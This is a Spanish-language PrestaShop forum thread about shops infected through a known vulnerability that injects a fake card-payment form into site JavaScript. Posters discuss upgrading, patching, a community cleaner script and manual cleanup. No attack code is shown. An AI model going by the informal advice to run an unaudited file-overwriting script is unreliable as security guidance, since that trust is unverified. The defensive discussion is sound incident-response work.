Jump to content

(SOLUCIONADO PARCHE VULNERABILIDAD PRESTASHOP) Metodo de pago desconocido - Phishing


SAKSCM

Recommended Posts

27 minutes ago, gusman126 said:

Posible solución no, cerrar una puerta si.

Al decir "solución" me refería a evitar en la medida de lo posible ser atacado...

Está claro que una vez copmprometido el sistema, esto no se soluciona tan facil.

Link to comment
Share on other sites

¿Qué hay que hacer para cerrar esa puerta en una 1.6.1.6?

He seguido el enlace que mandan al email pero me parece que ya ha evolucionado la cosa y creo que hay hasta módulos para cerrar esta puerta pero no encuentro nada en español de este tema, que en otros idiomas está explotando ahora, y aquí parece que lleváis desde Enero con esto.

En el foro Francés:

¿Qué hago?

Link to comment
Share on other sites

1 hour ago, EsteEstabaLibre said:

¿Qué hay que hacer para cerrar esa puerta en una 1.6.1.6?

He seguido el enlace que mandan al email pero me parece que ya ha evolucionado la cosa y creo que hay hasta módulos para cerrar esta puerta pero no encuentro nada en español de este tema, que en otros idiomas está explotando ahora, y aquí parece que lleváis desde Enero con esto.

En el foro Francés:

¿Qué hago?

 

Hola, 

Yo lo que te recomendaría sería actualizar ya que la 1.6 dejo de tener soporte hace ya más de un año y no solo vas a tener este problema si no muchos otros ya que no hay más actualizaciones de seguridad... Lo mejor para evitar este y otros problemas es tener siempre la versión más actualizada. Y ya no solo por esto si no por las mejoras que tienes y ademas tendrás el mismo problema con los módulos que tampoco tendrás ya actualizaciones ni seguridad, además también estás usando una versión de php obsoleta que añade más inseguridad, incompatibilidades y errores... 

Un saludo 

 

Link to comment
Share on other sites

Como dicen arriba, PrestaShop 1.6 no tiene soporte oficial por lo que todos los parches, actualizaciones y solución de fallos de seguridad solo van a ser para 1.7

Sabiendo que cambios se hacen en 1.7 puede que se pueda adaptar a la 1.6 otros cambios por ejemplo de módulos o código van a ser imposible adaptarlo al 1.6 

Desde hace 2 años lo estoy diciendo hay que actualizar a 1.7 o habrá riesgo de una infección, robo de datos y la posible denuncia por la AEPD sería mayor al gasto de la migración ( recordemos que por ley hay que avisar de las infecciones que hayan comprometido información de los clientes y base de datos )

  • Like 1
Link to comment
Share on other sites

11 hours ago, SAKSCM said:

 

Hola, 

Yo lo que te recomendaría sería actualizar ya que la 1.6 dejo de tener soporte hace ya más de un año y no solo vas a tener este problema si no muchos otros ya que no hay más actualizaciones de seguridad... Lo mejor para evitar este y otros problemas es tener siempre la versión más actualizada. Y ya no solo por esto si no por las mejoras que tienes y ademas tendrás el mismo problema con los módulos que tampoco tendrás ya actualizaciones ni seguridad, además también estás usando una versión de php obsoleta que añade más inseguridad, incompatibilidades y errores... 

Un saludo 

 

Buenos días,

No creo que haga falta recordar la respuesta que tú diste al principio del hilo, todo eso lo se, no es por falta de cariño que no esté a la última.

Se trata de Supervivencia donde estamos y como sea, pero vamos que en 11 años que llevo con esto suelen caer lo mismo las actualizadas que las viejas glorias. En este caso hay gente en la 1.4, 1.5 y de la 1.6.0.10 para abajo que están a salvo de esto.

Necesito saber como cerrar esa puerta y seguir tirando o mucho dinero para pasar de la 1.6 a la 1.7 cosa que la pandemia y demás no me está dejando ahorrar.

Gracias por responder.

Link to comment
Share on other sites

On 7/26/2022 at 9:09 AM, gusman126 said:

Como dicen arriba, PrestaShop 1.6 no tiene soporte oficial por lo que todos los parches, actualizaciones y solución de fallos de seguridad solo van a ser para 1.7

Sabiendo que cambios se hacen en 1.7 puede que se pueda adaptar a la 1.6 otros cambios por ejemplo de módulos o código van a ser imposible adaptarlo al 1.6 

Desde hace 2 años lo estoy diciendo hay que actualizar a 1.7 o habrá riesgo de una infección, robo de datos y la posible denuncia por la AEPD sería mayor al gasto de la migración ( recordemos que por ley hay que avisar de las infecciones que hayan comprometido información de los clientes y base de datos )

En el foro Francés hablan de soluciones para la 1.6 a ver si me entero. Sin saber Francés.

 

Edited by EsteEstabaLibre (see edit history)
Link to comment
Share on other sites

On 7/22/2022 at 6:57 PM, SAKSCM said:

Bueno pues ahora que parece que por fin esta resuelto el problema en esta web me llega un mail de prestashop que han encontrado esta vulnerabilidad... Pues si, parece ser que es una vulnerabilidad de prestashop, más concretamente del modilo de wishlist... 

Pego el correo con los enlaces  con la información y lo que parecen las soluciones para quien pueda servirle. 

Un saludo. 

 

Hola, 

Aquí, cuando prestashop informó del agujero, comente lo que desde presrahosp indicaban un archivo a modificar de forma momentánea para intentar cerrar esta puerta mientras sacaban el parche. Parche solo hay para la versión 1.7 pero eso te puede ayudar. 

No se cuanto consideras "una pasta" para actualizar a 1.7 todo depende de la web que tengáis claro, pero hay de todo. Incluso si lo haces tú mismo no te costará más que lo que te salga una nueva plantilla y un modulo para lograr datos que no son excesivamente caros, lo que te llevará es tiempo pero lo puedes hacer en paralelo. Como no es lo que se trata en este tema si quieres escríbeme por privado y te comento más detenidamente. Ni es tan caro ni tan complicado como puedas creer y los beneficios son muy superiores. 

En cualquier caso, mucha suerte con ello. Y a ver si es verdad que el kit digital sale como se espera, eso sí te diré que primero tienes que hacer la inversión y luego te dan la ayuda cuando presentes las facturas 😒 

Un saludo 

Link to comment
Share on other sites

  • SAKSCM changed the title to (SOLUCIONADO PARCHE VULNERABILIDAD PRESTASHOP) Metodo de pago desconocido - Phishing

Solo dire una cosa, YO estoy avisando desde el 2019 que PS 1.6 ya no tiene soporte, algunos de mis clientes, estuvieron apartando dinero durante 1 año o año y medio para pagar la migración, ahora lo tienen actualizado.

Sí, la falta de tener pasta para el presupuesto es una buena razon, pero ya os digo que una multa de la AEPD hace que cierres el negocio, se han tenido 2 años para apartar 1000€ o 1400€ que vale una migración profesional

Otros no es por dinero es por las modificaciones que tiene, casi imposible de pasar y los ultimos porque dicen que funciona bien y no cambian, estos ultimos ya les avise de lo que podria pasar, y ahora seguro que van a querer ir para ayer la actualización

Edited by gusman126 (see edit history)
Link to comment
Share on other sites

hace 21 minutos, EsteEstabaLibre dijo:

Abriré un hilo nuevo por ahí ya que este ha pasado a Solucionado.

Y los consejos que dáis son para gente de taco gordo. A ver que hacemos los demás.

Saludos y Gracias.

Pues lo mismo que hiciste con la 1.6

La instalaste tu? pues lo mismo con la 1.7  , no había prisa, 2 años y 2 o 3 infecciones graves han habido, desde enero 2022 hasta julio se ha tenido tiempo para instalar un 1.7 y configurar, luego pasar los datos entre versiones, usar un modulo, vale son +200 euros, pero ya esta ese es el gasto minimo,

Como bien dices en la pandemia, tiendas fisicas cerradas hubiera sido un buen momento para que la gente que se monto su propio PS se lo monte el mismo, no tiene mas complicaciones que hace 5 años

 

Link to comment
Share on other sites

9 minutes ago, gusman126 said:

Pues lo mismo que hiciste con la 1.6

La instalaste tu? pues lo mismo con la 1.7  , no había prisa, 2 años y 2 o 3 infecciones graves han habido, desde enero 2022 hasta julio se ha tenido tiempo para instalar un 1.7 y configurar, luego pasar los datos entre versiones, usar un modulo, vale son +200 euros, pero ya esta ese es el gasto minimo,

Como bien dices en la pandemia, tiendas fisicas cerradas hubiera sido un buen momento para que la gente que se monto su propio PS se lo monte el mismo, no tiene mas complicaciones que hace 5 años

 

Hasta hace poco y todavía hay expertos que aconsejaban quedarse en la 1.6 si solo se tenía una tienda. Incluso estaba planeado ahora si hubieran aprobado los fondos next generation subir a la última de la 1.6 aún sabiendo que no recibirá más actualizaciones cómo he visto aconsejado por ahí. No se si a día de hoy se aconseja ya pasar a 1.7 auqnue se tenga solo una tienda.

El salto a la 1.7 desde la 1.6 ya no va a ser para que lo haga yo, me oxidé y no me veo capaz porque al parecer hay cambios mayores que no controlo y la info de hoy en los foros no es la de hace 6 o 7 años.

A ver si puedo cerrar esa puerta y esperar el kit digital, si no viene el kit digital pronto la puerta que habrá que cerrar será otra.

Link to comment
Share on other sites

hace 4 minutos, EsteEstabaLibre dijo:

Hasta hace poco y todavía hay expertos que aconsejaban quedarse en la 1.6 si solo se tenía una tienda. Incluso estaba planeado ahora si hubieran aprobado los fondos next generation subir a la última de la 1.6 aún sabiendo que no recibirá más actualizaciones cómo he visto aconsejado por ahí. No se si a día de hoy se aconseja ya pasar a 1.7 auqnue se tenga solo una tienda.

Pues como ves esos "expertos" la han cagado pero bien, que lo dijeran en el 2020, vale, en el 2021, alguno, pero finales del 2021 y 2022 dudo que algún profesional dijese que 1.6 era mejor mantenerse, algún caso, multitienda o con módulos muy muy a medida, vale, pero por que pasar una multitienda a 1.7 es una autentica locura, yo las rechazo

 

Link to comment
Share on other sites

hace 6 minutos, EsteEstabaLibre dijo:

El salto a la 1.7 desde la 1.6 ya no va a ser para que lo haga yo, me oxidé y no me veo capaz porque al parecer hay cambios mayores que no controlo y la info de hoy en los foros no es la de hace 6 o 7 años.

No es tan complicado la verdad. Y no puedes apartar 1000€ en unos meses? o algo menos, incluso por 500 o 600 puedes encontrar a alguien que te prepare la 1.7 y que tu te apañes en configurar lo menos problematico y luego se traspasen los datos.

Link to comment
Share on other sites

20 hours ago, gusman126 said:

No es tan complicado la verdad. Y no puedes apartar 1000€ en unos meses? o algo menos, incluso por 500 o 600 puedes encontrar a alguien que te prepare la 1.7 y que tu te apañes en configurar lo menos problematico y luego se traspasen los datos.

O kit Digital o enfermería.

Se lleva mucho tiempo poniéndole dinero a los negocios, pues cierra dirás, tampoco es fácil eso.

Edited by EsteEstabaLibre
Quitar datos que no vienen al caso (see edit history)
Link to comment
Share on other sites

hace 1 minuto, EsteEstabaLibre dijo:

O kit Digital o enfermería.

La capacidad de ahorro se la llevó el ICO que hubo que pedir para sobrevivir, y lo que hay que no es poco y lo que dicen que viene que va a ser tremendo. Se lleva mucho tiempo poniéndole dinero a los negocios, pues cierra dirás, tampoco es fácil eso.

ok, entonces nada, un fastidio y una putada.

 

Link to comment
Share on other sites

@EsteEstabaLibre si tu negocio es online es donde deberías invertir el dinero, por que estar desactualizado solo te va a ocasionar mayores gastos, problemas y quebraderos de cabeza. Los expertos que te recomienden seguir en una versión que ya no tiene soporte ni para agujeros de seguridad no son muy expertos. Yo entiendo el problema económico, tampoco es mi punto fuerte, pero a veces hay que priorizar y si lo que te da de comer es precisamente la tienda online pues en mi opinión es dónde deberías priorizar, ahora si es algo secundario entonces ya es otro tema, pero sigue siendo algo que no te va a ayudar en nada tenerlo en una versión que ya lleva casi dos años descatalogada en todos los sentidos y por ende debes estar preparado y asumir las consecuencias que ello tiene, como te dice @gusman126 puede ser mayor lo que tengas que pagar por tener esta versión desactualizada que lo que te cueste actualizarla y si lo haces tu mismo todo ya te digo que no te saldrá por más de 300€ entre plantilla y módulo de migración, ahora si necesitas alguien que te lo haga por que no sepas actualizar, cambiar los estilos de la plantilla y resolver los problemas de migración, ahi ya claro te puede subir bastante más la cosa, pero tampoco es que te vaya a suponer un pastizal, no es lo mismo hacer una web de cero que hacer una actualización y más sabiendo las consecuencias que esto puede tener.

En cualquier caso, suerte con ello.

Un saludo.

Link to comment
Share on other sites

19 hours ago, SAKSCM said:

@EsteEstabaLibre si tu negocio es online es donde deberías invertir el dinero, por que estar desactualizado solo te va a ocasionar mayores gastos, problemas y quebraderos de cabeza. Los expertos que te recomienden seguir en una versión que ya no tiene soporte ni para agujeros de seguridad no son muy expertos. Yo entiendo el problema económico, tampoco es mi punto fuerte, pero a veces hay que priorizar y si lo que te da de comer es precisamente la tienda online pues en mi opinión es dónde deberías priorizar, ahora si es algo secundario entonces ya es otro tema, pero sigue siendo algo que no te va a ayudar en nada tenerlo en una versión que ya lleva casi dos años descatalogada en todos los sentidos y por ende debes estar preparado y asumir las consecuencias que ello tiene, como te dice @gusman126 puede ser mayor lo que tengas que pagar por tener esta versión desactualizada que lo que te cueste actualizarla y si lo haces tu mismo todo ya te digo que no te saldrá por más de 300€ entre plantilla y módulo de migración, ahora si necesitas alguien que te lo haga por que no sepas actualizar, cambiar los estilos de la plantilla y resolver los problemas de migración, ahi ya claro te puede subir bastante más la cosa, pero tampoco es que te vaya a suponer un pastizal, no es lo mismo hacer una web de cero que hacer una actualización y más sabiendo las consecuencias que esto puede tener.

En cualquier caso, suerte con ello.

Un saludo.

La actualización era lo primero que iba en el proyecto que se presentó para la ayuda de los fondos Next Generation.

Ya te dije que no es por falta de cariño.

Edited by EsteEstabaLibre (see edit history)
Link to comment
Share on other sites

51 minutes ago, gusman126 said:

Aconsejo a todos los que han pasado por la infección que se bajen el cleaner.php que hay en este mensaje del foro y que lo abran/ejecuten, me ha encontrado en una web "limpia" una modificación que no esperaba

 

image.thumb.png.19afd51447c49760cad6b93d02a5f66c.png

Muchas gracias ❤️

Una saludo 

Link to comment
Share on other sites

2 hours ago, gusman126 said:

Aconsejo a todos los que han pasado por la infección que se bajen el cleaner.php que hay en este mensaje del foro y que lo abran/ejecuten, me ha encontrado en una web "limpia" una modificación que no esperaba

 

Entonces habrá que aconsejar a los que ¿no? han sido afectados que lo pasen también.

La última versión del script de Eolia aparte de otra info importante que ofrece también "repasa" File Manager y hasta ofrece la opción de descargarlo o parchearlo del tirón. cosa que aconsejan para todo aquel que esté en la 1.6 y por debajo de la 1.6.1.22 Imperativamente.

Para los que gusten más de un módulo creo que hay uno y lo puedes ver en los comentarios del link donde te mandaba el email de presta: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/   Yo solo se del módulo que existe.

Saludos @SAKSCM y @gusman126   (Si somos 3 nada más con esto nos podemos hasta dar los buenos días)

 

Link to comment
Share on other sites

16 minutes ago, EsteEstabaLibre said:

Entonces habrá que aconsejar a los que ¿no? han sido afectados que lo pasen también.

La última versión del script de Eolia aparte de otra info importante que ofrece también "repasa" File Manager y hasta ofrece la opción de descargarlo o parchearlo del tirón. cosa que aconsejan para todo aquel que esté en la 1.6 y por debajo de la 1.6.1.22 Imperativamente.

Para los que gusten más de un módulo creo que hay uno y lo puedes ver en los comentarios del link donde te mandaba el email de presta: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/   Yo solo se del módulo que existe.

Saludos @SAKSCM y @gusman126   (Si somos 3 nada más con esto nos podemos hasta dar los buenos días)

 

Hola @EsteEstabaLibre

Estoy revisando un poco el archivo para ver que es lo que hace, aun no lo he pasado, no se si será válido solo para la 1.6 o también para la 1.7 como es mi caso y me da un poco de cosa aplicarlo sin más y romper algo, estoy traduciendo la pagina y leyendo todo a ver si lo especifica. Por lo mismo, no se si será o no bueno que sin infección se haga, pero a lo mejor no todo el mundo sabe si ha sido infectado o no antes de que aparezcan los ficheros maliciosos en cuestion.. ni idea jaja me gusta ir con pies de plomo

A mi el módulo que me recomendarion fue este https://addons.prestashop.com/en/website-security-access/2659-protect-my-shop.html pero claro vale una pasta y solo sirve si el sitio está libre de cualquier infección, es decir solo protege contra lo que pueda entrar lo que esté dentro no lo analiza ni elimina ni arregla. No se si es esto a lo que te refieres.

Un saludo y buenos días ;) 

Link to comment
Share on other sites

Si hablamos del cleaner.php vale para 1.6 y 1.7. Lo de si tiene infección supongo que habrá que pasarlo para saberlo, Si no hay infección no pasa nada y te indica los módulos que tienes instalados que pueden ser usados para atacar para que los vigiles. y a los que estén en la 1.6 les repasa el File Manager a ver si lo tienen bien y si no lo tienen bien les da la opción de descargarlo para hacerlo tú o tiene un botón el script para hacerlo directamente desde allí.

Si estás infectado te indica los ficheros en ROJO y los machaca por ficheros sanos, así que mejor no ver el color rojo por ningún lado.

Lo que no hace me parece es hacer un scan e informarte, sino que como vea algo lo corrige del tirón parece ser. Así que si solo quieres saber si hay ataque no lo pases porque parece que actua como vea algo.

De todas formas va cambiando con las horas y me parece que va por la 1.0.19 y aunque tengas una versión anterior al ejecutarlo lanza la última que haya.

  • Like 1
Link to comment
Share on other sites

2 minutes ago, EsteEstabaLibre said:

Si hablamos del cleaner.php vale para 1.6 y 1.7. Lo de si tiene infección supongo que habrá que pasarlo para saberlo, Si no hay infección no pasa nada y te indica los módulos que tienes instalados que pueden ser usados para atacar para que los vigiles. y a los que estén en la 1.6 les repasa el File Manager a ver si lo tienen bien y si no lo tienen bien les da la opción de descargarlo para hacerlo tú o tiene un botón el script para hacerlo directamente desde allí.

Si estás infectado te indica los ficheros en ROJO y los machaca por ficheros sanos, así que mejor no ver el color rojo por ningún lado.

Lo que no hace me parece es hacer un scan e informarte, sino que como vea algo lo corrige del tirón parece ser. Así que si solo quieres saber si hay ataque no lo pases porque parece que actua como vea algo.

De todas formas va cambiando con las horas y me parece que va por la 1.0.19 y aunque tengas una versión anterior al ejecutarlo lanza la última que haya.

Hola,

Ahh no consegui entender todo eso en el post, no se francés y el traductor de google no es gran cosa jajaja igual pregunté pero si ya lo dices pues nada voy a mirar a ver que tal en esta tienda, gracias por la aclaración.

La url de descarga es siempre la misma no? por que no he visto ninguna otra en todo el post.

Un saludo

Link to comment
Share on other sites

4 minutes ago, SAKSCM said:

Hola,

Ahh no consegui entender todo eso en el post, no se francés y el traductor de google no es gran cosa jajaja igual pregunté pero si ya lo dices pues nada voy a mirar a ver que tal en esta tienda, gracias por la aclaración.

La url de descarga es siempre la misma no? por que no he visto ninguna otra en todo el post.

Un saludo

Si, la misma, te descarga la última. https://devcustom.net/public/scripts/cleaner.zip

El mérito es de @Eolia

Vaya discurso les has dado 😂😁

Edited by EsteEstabaLibre (see edit history)
Link to comment
Share on other sites

7 minutes ago, EsteEstabaLibre said:

Si, la misma, te descarga la última. https://devcustom.net/public/scripts/cleaner.zip

El mérito es de @Eolia

Vaya discurso les has dado 😂😁

Si, gracias, no me salía para mencionarle no se por que, bueno espero que me lea.... Discurso? cabreo que tengo que despues de estar 6 meses dale que te pego con ello, hasta discutiendo con el hosting por que todo el mundo decía que era un problema de seguridad de la tienda en cuestion no un bug y que el hosting podría ser la causa y que si no sería mi plantilla etc (vamos que era un caso aislado problema de la tienda en cuestion y tras aparecer otros casos pasaba solo en tiendas 1.6) y cuando por fin parece que ya consigo solucionarlo salta prestashop que hay un bug y saltan soluciones por todas partes en días para cerrar puertas y limpiar archivos, bendita suerte tengo 😂😂😂😂😂😂

Un saludo.

Link to comment
Share on other sites

1 minute ago, SAKSCM said:

Si, gracias, no me salía para mencionarle no se por que, bueno espero que me lea.... Discurso? cabreo que tengo que despues de estar 6 meses dale que te pego con ello, hasta discutiendo con el hosting por que todo el mundo decía que era un problema de seguridad de la tienda en cuestion no un bug y que el hosting podría ser la causa y que si no sería mi plantilla etc (vamos que era un caso aislado problema de la tienda en cuestion y tras aparecer otros casos pasaba solo en tiendas 1.6) y cuando por fin parece que ya consigo solucionarlo salta prestashop que hay un bug y saltan soluciones por todas partes en días para cerrar puertas y limpiar archivos, bendita suerte tengo 😂😂😂😂😂😂

Un saludo.

Era broma compi, para relajar.

En ese post verás gente con mucho peso rajando lo más grande de presta de la manera que están llevando esto y deslizando que están tirando más por lo bonito que por lo necesario y eficaz.

Link to comment
Share on other sites

1 minute ago, EsteEstabaLibre said:

Era broma compi, para relajar.

En ese post verás gente con mucho peso rajando lo más grande de presta de la manera que están llevando esto y deslizando que están tirando más por lo bonito que por lo necesario y eficaz.

Ya ya, tranquilo, lo se, pero el cabreo sigue ahi no te creas, me lo intento tomar con risas pero pica jajaja. 

De todo hay en la viña del señor dicen 😂

Un saludo.

  • Haha 1
Link to comment
Share on other sites

 

Una cosa muy muy importante , realmente no se sabe por donde entra la infección, el parche oficial de PS es un pequeño cambio , cerrar una puerta, 

Ahora hay gente como Eolia que esta haciendo un codigo adicional para buscar posibles puertas y entradas, algo que en teoría debería ya haber existido pero no publicado.

@SAKSCM

 Lo que te ha pasado es muy raro, que en Enero se infectara tu web y te dieras cuenta, ademas siendo 1.7.x . y no ha sido la unica.

Por mi experiencia y por lo que he visto, tu web estuvo infectada una vez o dos veces máximo (no se seguro) , después de hacer bien la limpieza ( no se que hiciste la verdad ) pero una vez hecha la limpieza, los fallos y alarmas lo tenias en tu antivirus. por lo que es posible que estuvieras peleando meses sin razon, solo porque tu web antivirus decia que la web no era segura.

Justo antes de ayer, le paso a un cliente, NO tiene infección, un modulo añadía una url a un .js , esa url esta en la base de datos de url infectadas y saltaba el antivirus, pero su web NO estaba infectada.

 

Respecto a las soluciones y parches que están publicando, puede servir de ayuda , por ahora el cleaner.php el mejor, pero si esta infectada, no te la va a desinfectar al 100%

Todos los sistemas estan y seran atacados y ahora y en un futuro, por lo que tener siempre 100% de seguridad es imposible y mas teniendo cientos de modulos que no se actualizan y tienen el fallo de seguridad

 

 

 

Link to comment
Share on other sites

31 minutes ago, gusman126 said:

 

Una cosa muy muy importante , realmente no se sabe por donde entra la infección, el parche oficial de PS es un pequeño cambio , cerrar una puerta, 

Ahora hay gente como Eolia que esta haciendo un codigo adicional para buscar posibles puertas y entradas, algo que en teoría debería ya haber existido pero no publicado.

@SAKSCM

 Lo que te ha pasado es muy raro, que en Enero se infectara tu web y te dieras cuenta, ademas siendo 1.7.x . y no ha sido la unica.

Por mi experiencia y por lo que he visto, tu web estuvo infectada una vez o dos veces máximo (no se seguro) , después de hacer bien la limpieza ( no se que hiciste la verdad ) pero una vez hecha la limpieza, los fallos y alarmas lo tenias en tu antivirus. por lo que es posible que estuvieras peleando meses sin razon, solo porque tu web antivirus decia que la web no era segura.

Justo antes de ayer, le paso a un cliente, NO tiene infección, un modulo añadía una url a un .js , esa url esta en la base de datos de url infectadas y saltaba el antivirus, pero su web NO estaba infectada.

 

Respecto a las soluciones y parches que están publicando, puede servir de ayuda , por ahora el cleaner.php el mejor, pero si esta infectada, no te la va a desinfectar al 100%

Todos los sistemas estan y seran atacados y ahora y en un futuro, por lo que tener siempre 100% de seguridad es imposible y mas teniendo cientos de modulos que no se actualizan y tienen el fallo de seguridad

 

 

 

Hola @gusman126

No que va, no era solo alarma de mi antivirus, so fue este ultimo mes, el fichero js se reproducía cada 7 - 15 dias generando el falso formulario de la tarjeta, me costo 6 meses conseguir que no saliera más, eso no tenía nada que ver con el antivirus, pero si despues de el 26 del mes pasado (la ultima limpieza y sustitucion de archivos que hice) que parece que fue el final de la infección y ya no salió mas que me seguía saltando el antivirus y ahi ya avise al soporte y sacaron la web de la base de datos, pero hasta entonces si estuve con la infección.

Y esperemos que siga así. Que todos estos parches funcionen y de vez en cuando seguiré pasando el cleaner este a ver que dice, revisando la lista de módulos que han encontrado que pueden ser peligrosos (no tengo ninguno por el momento) y veremos a ver si no sale más.

Por supuesto, todos los parches son eso, parches, los hackers y los "no voy a decir la otra palabra que pienso pero os imaginais" siempre buscan y encuentran algo para hacer daño, engañar, estafar.... a si que ahora es esto pero en el futuro saldrá algo más sin duda.... 

Yo por mi parte más de lo que hago no puedo, hay antivirus en el hosting, hay firewall en el hosting, mantener la web actualizada y estar informado de todo lo que pueda decir prestashop y por supuesto la inestimable ayuda de la gente maravillosa de este foro :)

Gracias a todos. 

Link to comment
Share on other sites

hace 1 hora, SAKSCM dijo:

Hola @gusman126

No que va, no era solo alarma de mi antivirus, so fue este ultimo mes, el fichero js se reproducía cada 7 - 15 dias generando el falso formulario de la tarjeta, me costo 6 meses conseguir que no saliera más, eso no tenía nada que ver con el antivirus, pero si despues de el 26 del mes pasado (la ultima limpieza y sustitucion de archivos que hice) que parece que fue el final de la infección y ya no salió mas que me seguía saltando el antivirus y ahi ya avise al soporte y sacaron la web de la base de datos, pero hasta entonces si estuve con la infección.

 

Gracias a todos. 

 

Pues muy raro, la verdad. como te digo en mis casos limpieza completa y busqueda de codigo, es posible que por experiencia yo hiciera de una vez lo que te costo varias, pero es normal, incluso asi siempre hay riesgo de dejarse algo.

Por mi parte de nada, tambien gracias por poner el mensaje y decir que es lo que te pasaba.

Link to comment
Share on other sites

30 minutes ago, gusman126 said:

 

Pues muy raro, la verdad. como te digo en mis casos limpieza completa y busqueda de codigo, es posible que por experiencia yo hiciera de una vez lo que te costo varias, pero es normal, incluso asi siempre hay riesgo de dejarse algo.

Por mi parte de nada, tambien gracias por poner el mensaje y decir que es lo que te pasaba.

Seguramente, yo no tengo experiencia en limpieza de infecciones de este tipo a si que no me extrañaría. 

Sigamos construyendo una gran comunidad de ayuda :)

Un saludo

Link to comment
Share on other sites

On 28-7-2022 at 09:29, gusman126 said:

Ik raad iedereen aan die door de infectie is gegaan om de cleaner.php die in dit forumbericht staat te downloaden en deze te openen/uitvoeren, het heeft een wijziging gevonden die ik niet had verwacht op een "schone" website

 

image.thumb.png.19afd51447c49760cad6b93d02a5f66c.png

 

Esa URL está en el archivo original Línea 37:

That URL is in the Original file Line 37:  

https://github.com/PrestaShop/PrestaShop/blob/1.6.1.24/admin-dev/filemanager/ajax_calls.php

 

Link to comment
Share on other sites

  • 1 month later...

Hola,

también soy afectado con mi multitienda.  Mi sitio está con la última versión 1.7.8.7 que supuestamente corregía la vulnerabilidad conocida pero desde que actualicé de un momento a otro se modifica todos los archivos js del sitio.  No se cual módulo es el que genera este problema.

 

corregí todos los js del sitio hace dos dias pero nuevamente el día de hoy se volvieron a modificar todos los js del sitio.

 

Link to comment
Share on other sites

4 hours ago, ocio87 said:

Hola,

también soy afectado con mi multitienda.  Mi sitio está con la última versión 1.7.8.7 que supuestamente corregía la vulnerabilidad conocida pero desde que actualicé de un momento a otro se modifica todos los archivos js del sitio.  No se cual módulo es el que genera este problema.

 

corregí todos los js del sitio hace dos dias pero nuevamente el día de hoy se volvieron a modificar todos los js del sitio.

 

Hola, 

La actualización corrige la vulnerabilidad del core y módulos de prestashop, si tienes plantillas o módulos a parte tendrías que revisar si son vulnerables y actualizarlos también, pero si el sistema está ya infectado no lo limpia como tal. 

Lo que yo hice fue eliminar las carpetas app (ojo que aquí tienes la conexión con la base de datos en parameters.php compi año) controllers classes js vendor src y poner los de una instalación limpia de prestashop, también hay que mirar los módulos, los que sean de prestashop sustituyelos también y los que no, lo mejor es sustituirlos por la última versión de los mismos (ojo cuando digo sustituir no es sobrescribir si no eliminar el viejo y poner el nuevo por si acaso hay algún archivo que no exista en la versión original que genere todo esto). También puede ser que tengas alguna imagen que la lie parda eso es más difícil de ver... Hay un post en el foro en francés en el que un compañero ha creado un limpiador para eliminar o detectar archivos sospechosos te recomiendo que tras hacer la sustitución de estas carpetas lo pases para ver si aún queda más que pueda estar infectado o que te ayude en saber que vulnerabilidades hay... Yo me tire 5 meses para conseguir eliminarlo por completo (y luego salió la noticia de la vulnerabilidad y el parche manda webs jaja) pero nunca volvió a infectarse más te dejo el post sobre el limpiador. 

 

 

Link to comment
Share on other sites

3 hours ago, SAKSCM said:

Hola, 

La actualización corrige la vulnerabilidad del core y módulos de prestashop, si tienes plantillas o módulos a parte tendrías que revisar si son vulnerables y actualizarlos también, pero si el sistema está ya infectado no lo limpia como tal. 

Lo que yo hice fue eliminar las carpetas app (ojo que aquí tienes la conexión con la base de datos en parameters.php compi año) controllers classes js vendor src y poner los de una instalación limpia de prestashop, también hay que mirar los módulos, los que sean de prestashop sustituyelos también y los que no, lo mejor es sustituirlos por la última versión de los mismos (ojo cuando digo sustituir no es sobrescribir si no eliminar el viejo y poner el nuevo por si acaso hay algún archivo que no exista en la versión original que genere todo esto). También puede ser que tengas alguna imagen que la lie parda eso es más difícil de ver... Hay un post en el foro en francés en el que un compañero ha creado un limpiador para eliminar o detectar archivos sospechosos te recomiendo que tras hacer la sustitución de estas carpetas lo pases para ver si aún queda más que pueda estar infectado o que te ayude en saber que vulnerabilidades hay... Yo me tire 5 meses para conseguir eliminarlo por completo (y luego salió la noticia de la vulnerabilidad y el parche manda webs jaja) pero nunca volvió a infectarse más te dejo el post sobre el limpiador. 

 

 

Mañana en la noche intentaré reemplazando todas las carpetas del core y dejando la menos cantidad posible de módulos.  Les iré contando como me va con estos cambios.

Sospecho que es un módulo de Merchant o ADS que sincroniza los productos con facebook y google shoopping ya que en una de esas ocasiones después de que probé un anuncio de shoopping coincidencialmente se dañó el sitio.

Saludos y gracias por la oportuna respuesta,

Link to comment
Share on other sites

20 hours ago, gusman126 said:

Cuidado en reemplazar la carpeta /app además de la configuración están las traducciones 

Correcto, al final se me olvidó mencionarlo, yo tuve que retraducir por esto, pero solo las del core (no las de plantilla) se soluciona rápido descargando las traducciones desede el panel, el resto de traducciones no se me borraron (salvo que tengas algún cambio específico hecho en estas tradiciones claro. 

Un saludo y suerte 

Link to comment
Share on other sites

Hola,

He realizado una comparación de carpetas de prestashop 1.7.8.7 con respecto al prestashop que tengo en el servidor con la herramienta de Winmerge y se encontró unos archivos los cuales no son reportados por el cleaner desarrollado en el otro foro:

image.thumb.png.df1c650d2dabf38e5380d0b3a92b97e9.png

Abro ese archivo php y concide con lo que está modificando los js de todo el sitio:

image.thumb.png.1cccd97765387da5ded010273ef91723.png

 

En el scaneo del servidor también se encontraba malicioso el archivo download.php:

image.png.b0bc92929f9fb5e4540d0b44b2a03c19.png

Más adelante les cuento como me termina de ir después de eliminar los archivos sobrantes en el sitio.

image.png

image.png

Edited by ocio87 (see edit history)
Link to comment
Share on other sites

9 hours ago, ocio87 said:

Hola,

He realizado una comparación de carpetas de prestashop 1.7.8.7 con respecto al prestashop que tengo en el servidor con la herramienta de Winmerge y se encontró unos archivos los cuales no son reportados por el cleaner desarrollado en el otro foro:

image.thumb.png.df1c650d2dabf38e5380d0b3a92b97e9.png

Abro ese archivo php y concide con lo que está modificando los js de todo el sitio:

image.thumb.png.1cccd97765387da5ded010273ef91723.png

 

En el scaneo del servidor también se encontraba malicioso el archivo download.php:

image.png.b0bc92929f9fb5e4540d0b44b2a03c19.png

Más adelante les cuento como me termina de ir después de eliminar los archivos sobrantes en el sitio.

image.png

image.png

Hola, 

Gracias por la info a ver que tal. Yo tengo otro prestashop infectado y aunque no cambia el pago ya aun se estropea el BO casa X días, se soluciona sustituyendo la carpeta controller por una limpia pero aún no doy con quien lo fastidia, ya he cambiado todas las carpetas de prestashop por limpias 😒 estoy en el mismo punto que con el otro. 

Un saludo. 

Link to comment
Share on other sites

 

hace 30 minutos, SAKSCM dijo:

Hola, 

